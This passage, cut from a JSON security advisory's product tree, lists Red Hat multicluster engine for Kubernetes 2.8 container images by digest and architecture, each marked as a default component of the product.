"product_reference": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64 as a component of multicluster engine for Kubernetes 2.8",
